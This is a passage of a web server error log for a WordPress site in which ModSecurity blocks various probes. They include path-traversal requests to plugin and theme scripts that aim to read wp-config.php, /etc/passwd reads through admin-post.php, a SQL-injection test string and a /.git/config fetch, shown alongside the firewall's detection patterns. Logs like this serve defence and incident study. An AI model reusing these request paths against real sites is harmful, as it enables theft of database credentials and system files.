(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Sep 09 15:03:04.023194 2022] [:error] [pid 2212:tid 140343861294848] [client 152.89.196.13:51752] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/comment-stream.php"] [unique_id "Yxub-LGUUmm-BB5oB5WaZwAAAMk"] [Fri Sep 09 17:47:51.559805 2022] [:error] [pid 1986:tid 140343886472960] [client 152.89.196.13:55992] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/user/credits-wp.php"] [unique_id "YxvCl8Y_9-jezSRsdYynngAAAIY"] [Fri Sep 09 18:59:54.618206 2022] [:error] [pid 1985:tid 140343777367808] [client 152.89.196.13:57356] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/widgets-cron.php"] [unique_id "YxvTevb4oH1H4-42BbJ4qwAAAFM"] [Fri Sep 09 20:13:29.319257 2022] [:error] [pid 1985:tid 140343785760512] [client 152.89.196.13:58748] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/theme-install-private.php"] [unique_id "Yxvkufb4oH1H4-42BbJ47AAAAFI"] [Fri Sep 09 23:56:05.985394 2022] [autoindex:error] [pid 1985:tid 140344006616832] [client 95.77.98.92:35004] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Sep 10 02:48:28.243957 2022] [autoindex:error] [pid 2212:tid 140343998224128] [client 95.214.24.135:38186] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 10 03:12:20.135861 2022] [ssl:warn] [pid 19989:tid 139932989974400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 10 03:12:20.265016 2022] [ssl:warn] [pid 19990:tid 139932989974400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 10 03:12:20.628297 2022] [ssl:warn] [pid 19990:tid 139932989974400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 10 03:12:22.884195 2022] [ssl:warn] [pid 19990:tid 139932989974400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 10 03:12:25.122372 2022] [ssl:warn] [pid 20411:tid 140420630108032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 10 03:12:25.237722 2022] [ssl:warn] [pid 20412:tid 140420630108032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 10 06:20:19.494933 2022] [:error] [pid 20431:tid 140420432721664] [client 41.216.188.45:42478] [client 41.216.188.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yxxy8xz4O4IpIqaozbHm7gAAAII"], referer: www.google.com [Sat Sep 10 10:00:44.046677 2022] [:error] [pid 21205:tid 140420424328960] [client 45.227.156.14:47910] [client 45.227.156.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "YxymnBHnU-SxnaK4QjaxGwAAAMM"] [Sat Sep 10 12:33:22.538318 2022] [:error] [pid 21205:tid 140420331861760] [client 208.68.39.21:34332] [client 208.68.39.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "YxzKYhHnU-SxnaK4Qja7wQAAAMY"] [Sun Sep 11 03:09:18.964671 2022] [ssl:warn] [pid 18982:tid 139634751383424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 11 03:09:19.142738 2022] [ssl:warn] [pid 18983:tid 139634751383424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 11 03:09:19.548470 2022] [ssl:warn] [pid 18983:tid 139634751383424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 11 03:09:22.272818 2022] [ssl:warn] [pid 18983:tid 139634751383424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 11 03:09:24.544487 2022] [ssl:warn] [pid 19403:tid 140272648402816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 11 03:09:24.677726 2022] [ssl:warn] [pid 19404:tid 140272648402816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 11 07:08:12.906740 2022] [:error] [pid 20312:tid 140272222533376] [client 195.178.120.89:34366] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yx3PrHdvbqFIGulFuWweZwAAANU"], referer: www.google.com [Sun Sep 11 07:44:27.459890 2022] [:error] [pid 19422:tid 140272264496896] [client 167.99.171.106:35044] [client 167.99.171.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "Yx3YK6sXwYY1vk8Cn6fSoAAAAFA"] [Sun Sep 11 22:13:58.072894 2022] [:error] [pid 20312:tid 140272340031232] [client 20.254.169.192:57684] [client 20.254.169.192] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yx6j9ndvbqFIGulFuWwsmQAAAMc"], referer: www.google.com [Mon Sep 12 03:31:23.747440 2022] [ssl:warn] [pid 29490:tid 139982431549312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 12 03:31:23.878361 2022] [ssl:warn] [pid 29491:tid 139982431549312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 12 03:31:24.114435 2022] [ssl:warn] [pid 29491:tid 139982431549312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 12 03:31:25.604450 2022] [ssl:warn] [pid 29491:tid 139982431549312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 12 03:31:27.909598 2022] [ssl:warn] [pid 29909:tid 140556342351744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 12 03:31:28.063789 2022] [ssl:warn] [pid 29910:tid 140556342351744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 12 04:05:37.429667 2022] [:error] [pid 29928:tid 140555900061440] [client 195.178.120.89:43892] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yx72YR-NZvcR-LZ6qzcBYgAAABc"], referer: www.google.com [Mon Sep 12 12:33:56.960960 2022] [autoindex:error] [pid 30532:tid 140555916846848] [client 20.38.12.126:55732] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Sep 12 15:32:48.759436 2022] [autoindex:error] [pid 29928:tid 140555891668736] [client 20.169.24.39:60106] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Sep 13 03:09:21.751176 2022] [ssl:warn] [pid 31557:tid 140640407549824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 13 03:09:21.895842 2022] [ssl:warn] [pid 31558:tid 140640407549824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 13 03:09:22.239842 2022] [ssl:warn] [pid 31558:tid 140640407549824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 13 03:09:24.284858 2022] [ssl:warn] [pid 31558:tid 140640407549824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 13 03:09:26.618240 2022] [ssl:warn] [pid 31978:tid 140363334793088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 13 03:09:26.743575 2022] [ssl:warn] [pid 31979:tid 140363334793088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 13 06:57:10.610146 2022] [:error] [pid 31997:tid 140362928572160] [client 195.178.120.89:48514] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YyBwFuJzaLu1qPQnb-Rg8wAAAFI"], referer: www.google.com [Tue Sep 13 21:48:27.321923 2022] [:error] [pid 32643:tid 140362911786752] [client 82.223.74.155:40776] [client 82.223.74.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"] [unique_id "YyFA-zt7bz17DCyT3vqm0wAAANQ"] [Wed Sep 14 03:32:21.044603 2022] [ssl:warn] [pid 11789:tid 140165769205632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 14 03:32:21.207313 2022] [ssl:warn] [pid 11790:tid 140165769205632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 14 03:32:21.474950 2022] [ssl:warn] [pid 11790:tid 140165769205632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 14 03:32:23.735227 2022] [ssl:warn] [pid 11790:tid 140165769205632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 14 03:32:26.041623 2022] [ssl:warn] [pid 12212:tid 140686433998720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 14 03:32:26.152154 2022] [ssl:warn] [pid 12213:tid 140686433998720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 14 13:43:04.669285 2022] [:error] [pid 12884:tid 140686049359616] [client 45.55.231.37:37858] [client 45.55.231.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "YyIguAzZR_HU1xmufCltnAAAANA"] 2022/09/14 20:46:12 [crit] 12093#12093: *924697 SSL_do_handshake() failed (SSL: error:14094085:SSL routines:ssl3_read_bytes:ccs received early) while SSL handshaking, client: 181.176.115.136, server: 198.199.72.26:443 2022/09/14 20:51:55 [crit] 12094#12094: *925132 SSL_do_handshake() failed (SSL: error:14094085:SSL routines:ssl3_read_bytes:ccs received early) while SSL handshaking, client: 181.176.115.136, server: 198.199.72.26:443 2022/09/14 20:52:03 [crit] 12094#12094: *925143 SSL_do_handshake() failed (SSL: error:14094085:SSL routines:ssl3_read_bytes:ccs received early) while SSL handshaking, client: 181.176.115.136, server: 198.199.72.26:443 [Thu Sep 15 03:49:20.239871 2022] [ssl:warn] [pid 15155:tid 139676739725184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 15 03:49:20.355759 2022] [ssl:warn] [pid 15156:tid 139676739725184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 15 03:49:20.694105 2022] [ssl:warn] [pid 15156:tid 139676739725184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 15 03:49:22.335343 2022] [ssl:warn] [pid 15156:tid 139676739725184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 15 03:49:24.579006 2022] [ssl:warn] [pid 15579:tid 140141142378368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 15 03:49:24.701941 2022] [ssl:warn] [pid 15580:tid 140141142378368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/09/15 06:25:09 [error] 15559#15559: *935166 access forbidden by rule, client: 18.221.17.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Sep 15 06:34:21.529995 2022] [autoindex:error] [pid 16387:tid 140140798232320] [client 20.110.117.35:48560] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Sep 16 03:11:20.384461 2022] [ssl:warn] [pid 3083:tid 140450313602944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 16 03:11:20.511490 2022] [ssl:warn] [pid 3084:tid 140450313602944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 16 03:11:20.759551 2022] [ssl:warn] [pid 3084:tid 140450313602944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 16 03:11:22.796147 2022] [ssl:warn] [pid 3084:tid 140450313602944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 16 03:11:25.060301 2022] [ssl:warn] [pid 3510:tid 140670709327744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 16 03:11:25.169911 2022] [ssl:warn] [pid 3511:tid 140670709327744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 17 03:49:21.278821 2022] [ssl:warn] [pid 19274:tid 140190873286528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 17 03:49:21.401946 2022] [ssl:warn] [pid 19275:tid 140190873286528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 17 03:49:21.743613 2022] [ssl:warn] [pid 19275:tid 140190873286528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 17 03:49:24.129954 2022] [ssl:warn] [pid 19275:tid 140190873286528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 17 03:49:26.375603 2022] [ssl:warn] [pid 19701:tid 140152290117504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 17 03:49:26.488781 2022] [ssl:warn] [pid 19702:tid 140152290117504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 17 04:04:02.660113 2022] [:error] [pid 20374:tid 140151988659968] [client 185.81.128.102:36926] [client 185.81.128.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YyWNgrvagb1bTfOBgHRLDAAAAMY"] [Sat Sep 17 10:30:41.602214 2022] [:error] [pid 20374:tid 140151887947520] [client 5.188.62.26:48066] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file 